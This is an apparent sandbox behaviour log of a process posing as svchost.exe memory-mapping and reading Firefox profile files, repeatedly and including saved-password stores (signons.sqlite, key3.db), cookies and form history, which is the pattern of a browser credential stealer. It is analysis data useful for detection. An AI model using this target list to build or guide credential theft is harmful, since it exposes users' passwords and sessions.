Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
